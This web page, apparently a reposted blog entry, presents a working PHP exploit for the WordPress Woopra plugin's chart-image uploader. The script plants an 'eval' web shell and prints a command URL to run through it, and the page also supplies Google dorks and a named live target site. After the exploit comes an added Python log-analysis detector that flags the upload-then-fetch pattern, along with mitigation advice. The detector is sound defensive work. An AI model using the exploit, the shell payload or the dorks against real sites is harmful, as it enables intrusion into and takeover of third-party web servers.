  • WordPress Woopra plugin remote PHP arbitrary code execution exploit.

    Test method:

    The program (method) provided may be offensive in nature and is supplied for security research and teaching only; use at your own risk!

    # Exploit Title: woopra plugins execute arbitrary PHP code Exploit
    # Google Dork: inurl:/plugins/woopra/inc/php-ofc-library , inurl:wp-content/plugins/woopra/inc/
    # Date: [06-10-2013]
    # Exploit Author: wantexz
    # Vendor Homepage:wordpress.org/plugins/woopra/
    # Software Link: wordpress.org/plugins/woopra
    # Version: woopra
    # Tested on: [wantexz]
    # CVE :
    # target tested: http://zainhd.com/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php


    ############################################################################################
    # INDONESIANCODER
    # by
    # WANTEXZ
    #
    ############################################################################################


    <?php

    # woopra plugins ~ Exploit
    # http://indonesiancoder.com/
    #

    echo <<<EOT

    # -----------------------------------
    #/ woopra ~ Exploit
    # Author: wantexz /
    # -----------------------------------

    ################################################################################################
    # Author: WANTEXZ
    #
    # thank to : tukulesto,arianom,cimpli,jack_jahat,k4L0NG666,Br3NG0S,Xr0b0t,blie,KaMtiEz,Mboys
    # all indonesian coder, indonesian defacer, kill-9, jatimcom, malangcyber
    #
    ################################################################################################

    EOT;


    $options = getopt('u:f:');

    if(!isset($options['u'], $options['f']))
    die(" Usage example: php IDC.php -u http://target.com/ -f shell.php
    -u http://target.com/ The full path to Joomla!
    -f shell.php The name of the file to create. ");

    $url = $options['u'];
    $file = $options['f'];


    $shell ="{$url}//wp-content/plugins/woopra/inc/tmp-upload-images/{$file}";
    $url ="{$url}/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name={$file}";

    $data ="<?php eval($_GET['cmd']); ?>";
    $headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1',
    'Content-Type: text/plain');


    echo " [+] Submitting request to: {$options['u']} ";


    $handle = curl_init();

    curl_setopt($handle, CURLOPT_URL, $url);
    curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
    curl_setopt($handle, CURLOPT_RETURNTRANSFER,true);

    $source = curl_exec($handle);
    curl_close($handle);


    if(!strpos($source,'Undefined variable: HTTP_RAW_POST_DATA')&&
    @fopen($shell,'r'))
    {
    echo " [+] Exploit completed successfully! ";
    echo " ______________________________________________
    {$shell}?cmd=system('id'); ";
    }
    else
    {
    die(" [+] Exploit was unsuccessful. ");
    }

    ?>
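The script above leaves a very recognisable trace in web-server access logs: a POST to the bundled Open Flash Chart uploader `php-ofc-library/ofc_upload_image.php` whose `name` parameter carries a script extension, followed by a GET for the same file name under `tmp-upload-images/`. The following detector is an added, defender-side example written for this page; it is not part of the original exploit or of the Woopra plugin. The path fragments come from the exploit above, the combined-format log lines are constructed for the demonstration, and the extension list and finding labels are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not taken from any real server.
SAMPLE_LOG = """\
203.0.113.5 - - [06/Oct/2013:12:00:01 +0000] "POST /wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name=shell.php HTTP/1.1" 200 64 "-" "Mozilla/5.0"
203.0.113.5 - - [06/Oct/2013:12:00:02 +0000] "GET /wp-content/plugins/woopra/inc/tmp-upload-images/shell.php?cmd=system('id'); HTTP/1.1" 200 128 "-" "Mozilla/5.0"
198.51.100.7 - - [06/Oct/2013:12:05:00 +0000] "POST /wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name=chart.png HTTP/1.1" 200 64 "-" "Mozilla/5.0"
192.0.2.9 - - [06/Oct/2013:12:06:00 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
this line is not a log entry
"""

# Minimal combined-log-format parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Path fragments used by the exploit on this page.
UPLOAD_ENDPOINT = "/php-ofc-library/ofc_upload_image.php"
TMP_DIR = "/tmp-upload-images/"
# Assumed list of extensions a PHP host would execute; extend for your own server config.
EXEC_EXT = (".php", ".phtml", ".php5", ".phar")


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path
    entry["query"] = parse_qs(parts.query)
    entry["status"] = int(entry["status"])
    return entry


def classify(entry):
    """Label one parsed entry with a finding name, or None if it is benign."""
    path = entry["path"].lower()
    if entry["method"] == "POST" and path.endswith(UPLOAD_ENDPOINT):
        # The uploader takes the destination file name from the query string.
        name = entry["query"].get("name", [""])[0].lower()
        if name.endswith(EXEC_EXT):
            return "ofc_upload_executable"
        return "ofc_upload_any"
    if TMP_DIR in path and path.endswith(EXEC_EXT):
        # A script being requested from the uploader's scratch directory.
        return "tmp_upload_script_access"
    return None


def detect(log_text):
    """Return (ip, label, path, status) tuples for every suspicious log entry."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        label = classify(entry)
        if label:
            findings.append((entry["ip"], label, entry["path"], entry["status"]))
    return findings


def correlate(findings):
    """Return IPs that both uploaded a script and then fetched one from the temp directory."""
    uploaded = {ip for ip, label, _, _ in findings if label == "ofc_upload_executable"}
    fetched = {ip for ip, label, _, _ in findings if label == "tmp_upload_script_access"}
    return sorted(uploaded & fetched)


if __name__ == "__main__":
    hits = detect(SAMPLE_LOG)
    for hit in hits:
        print(hit)
    print("likely compromised via OFC uploader:", correlate(hits))
```

The `ofc_upload_any` label is kept separate from the executable case on purpose: a legitimate chart image upload through the same endpoint looks identical apart from the extension, so alerting on every POST would be noisy, while the upload-then-fetch correlation in `correlate` is the high-confidence signal. Removing or disabling `php-ofc-library` and denying script execution inside `tmp-upload-images` closes the path the exploit relies on; the detector then serves to find historic abuse.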
  • Original source: https://www.cnblogs.com/security4399/p/3359933.html